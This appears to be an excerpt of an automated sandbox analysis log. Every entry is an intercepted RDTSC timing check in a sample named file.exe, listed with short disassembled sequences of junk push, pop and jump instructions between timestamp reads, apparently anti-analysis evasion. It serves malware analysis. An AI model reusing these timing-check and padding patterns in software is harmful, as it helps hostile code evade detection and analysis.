Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1393D30 second address: 1393D5A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F400D373720h 0x00000007 jl 00007F400D373716h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F400D37371Dh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1393EB3 second address: 1393EB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1394394 second address: 13943A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push esi 0x00000007 jp 00007F400D373722h 0x0000000d jl 00007F400D373716h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 139BC9D second address: 139BCCF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F400D181C0Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F400D181C15h 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push edx 0x00000019 pop edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 139BCCF second address: 139BCD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 139BCD3 second address: 139BCD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1399E50 second address: 1399E74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F400D373716h 0x0000000a popad 0x0000000b jmp 00007F400D373729h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1399E74 second address: 1399E7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1399E7C second address: 1399E80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 139A01A second address: 139A01E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 139A8E8 second address: 139A8EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 139A8EC second address: 139A90B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F400D181C19h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 139A90B second address: 139A910 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 139A910 second address: 139A91C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F400D181C06h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 139ABA2 second address: 139ABA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 139ABA8 second address: 139ABCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 jmp 00007F400D181C10h 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F400D181C0Ah 0x00000015 push esi 0x00000016 pop esi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 139ABCF second address: 139AC01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop ecx 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007F400D373726h 0x00000013 jmp 00007F400D37371Fh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 139F9EA second address: 139F9EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 139F9EF second address: 139FA09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007F400D373721h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 139FB89 second address: 139FB9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jnl 00007F400D181C06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c je 00007F400D181C08h 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 139FE4F second address: 139FE53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 139FE53 second address: 139FE57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 139FE57 second address: 139FE73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F400D373720h 0x0000000b pop esi 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 139FE73 second address: 139FE79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 139FE79 second address: 139FE7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 139FE7D second address: 139FE96 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F400D181C0Fh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13A0029 second address: 13A0043 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F400D373726h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13A0043 second address: 13A0047 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13A0047 second address: 13A0053 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F400D373716h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13A0053 second address: 13A005E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F400D181C06h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13A005E second address: 13A0064 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13A049D second address: 13A04AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F400D181C06h 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007F400D181C06h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13A04AF second address: 13A04B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13A05E2 second address: 13A05FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F400D181C0Dh 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13A05FA second address: 13A060E instructions: 0x00000000 rdtsc 0x00000002 jng 00007F400D373716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push edi 0x0000000e pop edi 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13ACBCD second address: 13ACBF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F400D181C0Ch 0x00000009 pop eax 0x0000000a jmp 00007F400D181C18h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13ACBF6 second address: 13ACBFB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13ACBFB second address: 13ACC09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F400D181C06h 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13AD231 second address: 13AD236 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13AD390 second address: 13AD3BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F400D181C0Dh 0x00000010 jmp 00007F400D181C17h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13AD50F second address: 13AD51A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13AD681 second address: 13AD686 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13AD686 second address: 13AD69D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ecx 0x00000007 pushad 0x00000008 jmp 00007F400D37371Dh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13AD69D second address: 13AD6A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13AD6A3 second address: 13AD6A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13AE8B3 second address: 13AE8D7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F400D181C15h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jnl 00007F400D181C06h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B4637 second address: 13B4641 instructions: 0x00000000 rdtsc 0x00000002 je 00007F400D37371Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B4641 second address: 13B4659 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jg 00007F400D181C0Ah 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B4659 second address: 13B4661 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B4019 second address: 13B401F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B401F second address: 13B4024 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B41BA second address: 13B41E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F400D181C16h 0x00000007 jmp 00007F400D181C15h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B4352 second address: 13B435F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 ja 00007F400D373716h 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B435F second address: 13B436C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 je 00007F400D181C06h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C6E8F second address: 13C6E99 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F400D373716h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C6E99 second address: 13C6EB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F400D181C18h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C703F second address: 13C7043 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C7043 second address: 13C706A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F400D181C13h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007F400D181C08h 0x0000000f push eax 0x00000010 pop eax 0x00000011 popad 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 pop esi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C706A second address: 13C706E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D0041 second address: 13D0045 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D0045 second address: 13D006C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jnp 00007F400D373716h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F400D373729h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D006C second address: 13D0072 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E6260 second address: 13E627C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F400D373726h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E627C second address: 13E6280 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E6280 second address: 13E628A instructions: 0x00000000 rdtsc 0x00000002 js 00007F400D373716h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E628A second address: 13E629D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jl 00007F400D181C0Eh 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E5DBC second address: 13E5DC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E5DC0 second address: 13E5DD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 jns 00007F400D181C06h 0x0000000f jnc 00007F400D181C06h 0x00000015 pop edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E5F3F second address: 13E5F53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F400D373720h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E5F53 second address: 13E5F7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F400D181C17h 0x00000008 jmp 00007F400D181C0Ch 0x0000000d push esi 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E5F7D second address: 13E5FAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jp 00007F400D37371Eh 0x0000000e jmp 00007F400D373727h 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13F7D14 second address: 13F7D38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F400D181C16h 0x00000009 jne 00007F400D181C0Ah 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13F02B5 second address: 13F02CC instructions: 0x00000000 rdtsc 0x00000002 jno 00007F400D373716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jnl 00007F400D373716h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13F02CC second address: 13F02D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13F02D5 second address: 13F02D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1405DAD second address: 1405DC7 instructions: 0x00000000 rdtsc 0x00000002 je 00007F400D181C15h 0x00000008 push esi 0x00000009 pop esi 0x0000000a jmp 00007F400D181C0Dh 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1405977 second address: 140597E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 141A5A6 second address: 141A5AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 141A5AE second address: 141A5B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 141A5B5 second address: 141A5BA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 141A5BA second address: 141A5E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 jmp 00007F400D37371Eh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebx 0x0000000f jo 00007F400D37371Ch 0x00000015 jbe 00007F400D373716h 0x0000001b push eax 0x0000001c push edx 0x0000001d push ecx 0x0000001e pop ecx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 141A71E second address: 141A755 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F400D181C18h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jns 00007F400D181C0Ch 0x00000014 pushad 0x00000015 jbe 00007F400D181C06h 0x0000001b push edi 0x0000001c pop edi 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 141A755 second address: 141A775 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F400D373726h 0x00000007 jl 00007F400D37371Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 141AF8C second address: 141AF94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 141AF94 second address: 141AF9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 141AF9A second address: 141AFA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 141AFA0 second address: 141AFAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 141AFAB second address: 141AFAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 141AFAF second address: 141AFC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jnp 00007F400D373716h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 141AFC3 second address: 141AFDF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F400D181C0Ah 0x00000007 jmp 00007F400D181C0Ah 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 141B2E6 second address: 141B308 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jns 00007F400D373716h 0x0000000c popad 0x0000000d popad 0x0000000e jl 00007F400D373728h 0x00000014 js 00007F400D373722h 0x0000001a jp 00007F400D373716h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 141B427 second address: 141B42B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 141CE5A second address: 141CE5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 141FD70 second address: 141FDA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jnc 00007F400D181C06h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jmp 00007F400D181C11h 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F400D181C11h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 141FDA7 second address: 141FDC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F400D373729h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14232B8 second address: 14232BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14232BD second address: 14232C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14232C3 second address: 14232C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14232C9 second address: 14232D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
